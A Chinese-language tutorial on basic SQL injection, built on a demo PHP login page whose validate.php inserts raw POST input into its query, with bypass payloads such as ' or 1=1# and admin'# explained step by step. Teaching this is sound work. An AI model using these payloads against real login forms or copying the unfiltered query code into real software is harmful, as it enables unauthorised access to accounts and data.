常見SQL注入的方法

常見SQL注入的方法

WEB安全性SQL注入

引言：

在開發網站的時候，出於安全考慮，需要過濾從頁面傳遞過來的字元。通常，使用者可以透過以下介面呼叫資料庫的內容：URL網址列、登陸介面、留言板、搜尋框等。這往往給駭客留下了可乘之機。輕則資料遭到洩露，重則伺服器被拿下。

一、SQL注入步驟

a)找出注入點，建構特殊的語句

傳入SQL語句可控參數分成兩類
1. 數字類型，參數不用被引號括起來，如?id=1 
2. 其他類型，參數要被引號擴起來,如?name="phone"

b)使用者建構SQL語句(如：'or 1=1#；admin'#（這個注入又稱PHP的萬能密碼，是已知使用者名稱的情況下，可繞過輸入密碼）以後再做解釋)

c)將SQL語句傳送給DBMS資料庫

d)DBMS收到回傳的結果，並將該要求解釋成機器碼指令，執行必要得到操作

e)DBMS接受回傳結果，處理後，回傳給使用者

因為使用者建構了特殊的SQL語句，必定回傳特殊的結果(只要你的SQL語句夠靈活)

下面，我透過一個實例具體來示範下SQL注入
二、SQL注入實例詳解(以上測試皆假設伺服器未開啟magic_quote_gpc) 

1) 前期準備工作
先來示範通過SQL注入漏洞，登錄後台管理員介面
首先，建立一張試驗用的資料表： 

CREATE TABLE `users` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(64) NOT NULL,
`password` varchar(64) NOT NULL,
`email` varchar(64) NOT NULL,PRIMARY KEY (`id`),UNIQUE KEY `username` (`username`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;

新增一筆記錄用於測試：

INSERT INTO users (username,password,email)VALUES('MarcoFly',md5('test'),'marcofly@test.com');

接下來，貼上登入介面的原始碼

<html>
 <head> 
  <title>Sql注入演示</title> 
  <meta http-equiv="content-type" content="text/html;charset=utf-8" /> 
 </head> 
 <body> 
  <form action="validate.php" method="post"> 
   <fieldset> 
    <legend>Sql注入演示</legend> 
    <table> 
     <tbody>
      <tr> 
       <td>用户名：</td>
       <td><input type="text" name="username" /></td> 
      </tr> 
      <tr> 
       <td>密 码：</td>
       <td><input type="text" name="password" /></td> 
      </tr> 
      <tr> 
       <td><input type="submit" value="提交" /></td>
       <td><input type="reset" value="重置" /></td> 
      </tr> 
     </tbody>
    </table> 
   </fieldset> 
  </form>   
 </body>
</html>

附上效果圖：

#當使用者點擊提交按鈕的時候，會把表單資料提交給validate.php頁面，validate.php頁面用來判斷使用者輸入的使用者名稱和密碼有沒有都符合要求（這一步至關重要，也往往是SQL漏洞所在）

!                                         <!--前台和后台对接-->
<html>
<head>
<title>登录验证</title>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
</head>
<body>
<?php
$conn=@mysql_connect("localhost",&#39;root&#39;,&#39;&#39;) or die("数据库连接失败！");;
mysql_select_db("injection",$conn) or die("您要选择的数据库不存在");
$name=$_POST[&#39;username&#39;];
$pwd=$_POST[&#39;password&#39;];
$sql="select * from users where username=&#39;$name&#39; and password=&#39;$pwd&#39;";
$query=mysql_query($sql);
$arr=mysql_fetch_array($query);
if(is_array($arr)){
header("Location:manager.php");
}else{
echo "您的用户名或密码输入有误，<a href=\"Login.php\">请重新登录！</a>";
}
?>
</body>
</html>

注意到了沒有，我們直接將使用者提交過來的資料(使用者名稱和密碼)直接拿去執行，並沒有實現進行特殊字元過濾，待會你們將會明白，這是致命的。
程式碼分析：如果，使用者名稱和密碼都符合成功的話，將跳到管理員操作介面(manager.php)，不成功，則給予友善提示訊息。
登入成功的介面：

 登入失敗的提示：

##到這裡，前期工作已經做好了，接下來將展開我們的重頭戲：SQL注入

 2) 建構SQL語句

填好正確的使用者名稱(marcofly)和密碼(test)後，點選提交，將會傳回給我們「歡迎管理員」的介面。
因為根據我們提交的使用者名稱和密碼被合成到SQL查詢語句當中之後是這樣的：

select * from users where username='marcofly' and password=md5('test')

#很明顯，使用者名稱和密碼都和我們之前給的一樣，肯定能夠成功登陸。但是，如果我們輸入一個錯誤的使用者名稱或密碼呢？很明顯，肯定登錄不了吧。恩，正常情況下是如此，但是對於有SQL注入漏洞的網站來說，只要建構個特殊的“字串”，照樣能夠成功登入。

例如：在使用者名稱輸入框中輸入:' or 1=1#,密碼隨便輸入，這時候的合成後的SQL查詢語句為：

select * from users where username='' or 1=1#' and password=md5('')

語意分析：「#」在mysql中是註解符，這樣井號後面的內容將被mysql視為註解內容，這樣就不會去執行了，換句話說，以下的兩句sql語句等價： 

select * from users where username='' or 1=1#' and password=md5('')

等價於

select* from users where usrername='' or 1=1

因為1=1永遠是都是成立的，即where子句總是為真，將該sql進一步簡化之後，等價於如下select語句：

select * from users

沒錯，此sql語句的作用是檢索users表中的所有欄位 

上面就是一個輸入方法，這裡再介紹一種注入的方法，這個方法又稱PHP的萬能密碼

我們再已知用戶名的條件下，可以不能密碼即可登錄，假設用戶名：admin

構造語句：

select * from users where username='admin'#' and password=md5('')

等價於

select * from users where username='admin'

這樣即可不能輸入密碼登入上去的。

資料庫就會錯認為不用用戶名既可以登錄，繞過後台的驗證，已到達注入的目的。

同樣利用了SQL語法的漏洞。

看到了吧，一個經構造後的sql語句竟有如此可怕的破壞力，相信你看到這後，開始對sql注入有了一個理性的認識了吧~
沒錯，SQL注入就是這麼容易。但是，要根據實際情況建構靈活的sql語句卻不是那麼容易的。有了基礎之後，自己再去慢慢摸索。
有沒有想過，如果經由後台登入視窗提交的資料都被管理員過濾掉特殊字元之後呢？這樣的話，我們的萬能用戶名' 或 1=1#就無法使用了。但這並不是說我們就毫無對策，要知道使用者和資料庫打交道的途徑不只這條。

推薦：《mysql教學》

以上是常見SQL注入的方法的詳細內容。更多資訊請關注PHP中文網其他相關文章！